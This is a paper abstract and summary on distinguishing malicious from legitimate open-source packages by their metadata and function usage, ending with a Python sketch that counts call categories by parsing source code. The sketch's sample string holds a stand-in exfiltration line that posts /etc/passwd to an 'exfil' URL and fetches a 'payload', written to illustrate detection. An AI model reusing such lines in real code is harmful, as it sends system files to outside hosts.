A Large-scale Fine-grained Analysis of Packages in Open-Source Software Ecosystems

Xiaoyan Zhou, Feiran Liang, Zhaojie Xie, Yang Lan, Wenjia Niu, Jiqiang Liu, Haining Wang, Qiang Li
2024-04-17
Abstract: Package managers such as NPM, Maven, and PyPI play a pivotal role in open-source software (OSS) ecosystems, streamlining the distribution and management of various freely available packages. The fine-grained details within software packages can unveil potential risks within existing OSS ecosystems, offering valuable insights for detecting malicious packages. In this study, we undertake a large-scale empirical analysis focusing on fine-grained information (FGI): the metadata, static, and dynamic functions. Specifically, we investigate the FGI usage across a diverse set of 50,000+ legitimate and 1,000+ malicious packages. Based on this diverse data collection, we conducted a comparative analysis between legitimate and malicious packages. Our findings reveal that (1) malicious packages have less metadata content and utilize fewer static and dynamic functions than legitimate ones; (2) malicious packages demonstrate a higher tendency to invoke HTTP/URL functions as opposed to other application services, such as FTP or SMTP; (3) FGI serves as a distinguishable indicator between legitimate and malicious packages; and (4) one dimension in FGI has sufficient distinguishable capability to detect malicious packages, and combining all dimensions in FGI cannot significantly improve overall performance.
Software Engineering, Cryptography and Security
What problem does this paper attempt to address?
The main problem this paper addresses is the security threat posed by malicious packages in the open-source software (OSS) ecosystem. Specifically, the authors examine whether fine-grained information (FGI) can distinguish legitimate packages from malicious ones and thus serve as a basis for detecting malicious packages. The objectives and methods of the research are as follows.

### Research Background and Problem

With the wide adoption of the open-source software ecosystem, package managers such as NPM, Maven, and PyPI play a crucial role in distributing and managing freely available packages. However, reusing these packages also brings security risks, because attackers may inject malicious code into packages or tamper with originally legitimate ones to attack downstream systems. For example, in 2018, attackers exploited the development permissions of the 'eslint-scope' package to embed malicious executables, affecting a large number of systems.

### Research Objectives

The paper explores how fine-grained information (FGI) can be applied to detecting malicious packages, through a large-scale empirical analysis of more than 50,000 legitimate packages and more than 1,000 malicious packages. The research focuses on three dimensions:

- **Metadata**: the package name, version, author, dependencies, etc.
- **Static functions**: methods integrated directly into the source code, which depend on the programming language used.
- **Dynamic functions**: functionality that provides flexibility during the installation or running phase.

### Research Questions

To achieve these objectives, the research poses the following research questions (RQs):

1. **RQ1**: How do legitimate and malicious packages differ at the metadata level?
2. **RQ2**: How do legitimate and malicious packages differ at the static function level?
3. **RQ3**: How do legitimate and malicious packages differ at the dynamic function level?
4. **RQ4**: How effective is fine-grained information for detecting malicious packages?

### Main Findings

Through comparative analysis, the authors draw the following conclusions:

1. **Metadata level**: Malicious packages usually have shorter descriptions, fewer authors, no URL links, and fewer dependencies.
2. **Static function level**: The types and frequencies of static functions called by malicious packages differ significantly from those of legitimate packages, especially for network-related and file-operation functions.
3. **Dynamic function level**: Malicious packages are more likely to call HTTP/URL functions than other application services (such as FTP or SMTP).
4. **Detection effect**: A detection model based on fine-grained information achieves an accuracy of 97.5% and a recall of 94.4%, indicating that FGI can serve as a reliable distinguishing indicator.

### Summary

This research reveals significant differences between legitimate and malicious packages through an in-depth analysis of fine-grained information, and it proposes an effective method for detecting malicious packages. The result helps improve the security of the open-source software ecosystem and provides an important reference for developers.
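To make the static-function dimension more concrete, the following is a minimal sketch of how calls in a Python package's source could be counted by category. It is not the authors' tooling: the `CATEGORIES` map, the helper names `dotted_name` and `count_calls_by_category`, and the `SAMPLE` snippet are all assumptions made up for illustration, and the category list is far smaller than any real taxonomy would be. The source is only parsed with the standard `ast` module, never executed.

```python
import ast
from collections import Counter

# Hypothetical category map, assumed for illustration only;
# it is not the taxonomy used in the paper.
CATEGORIES = {
    "http_url": {"urllib.request.urlopen", "requests.get", "requests.post"},
    "ftp": {"ftplib.FTP"},
    "smtp": {"smtplib.SMTP"},
    "process": {"os.system", "subprocess.run", "subprocess.Popen"},
    "file": {"open"},
}


def dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def count_calls_by_category(source):
    """Count call sites in `source` whose callee name falls in a known category."""
    counts = Counter()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            for category, names in CATEGORIES.items():
                if name in names:
                    counts[category] += 1
    return counts


# Made-up snippet standing in for a package's source file (parsed, not run).
SAMPLE = '''
import os, requests
requests.get("http://example.invalid/payload")
requests.post("http://example.invalid/exfil", data=open("/etc/passwd").read())
os.system("echo hi")
'''

if __name__ == "__main__":
    for category, n in sorted(count_calls_by_category(SAMPLE).items()):
        print(category, n)
```

Matching on the literal dotted name keeps the sketch short, but it misses aliased imports such as `import requests as r` and calls made through variables. A practical extractor would need to resolve names before counting.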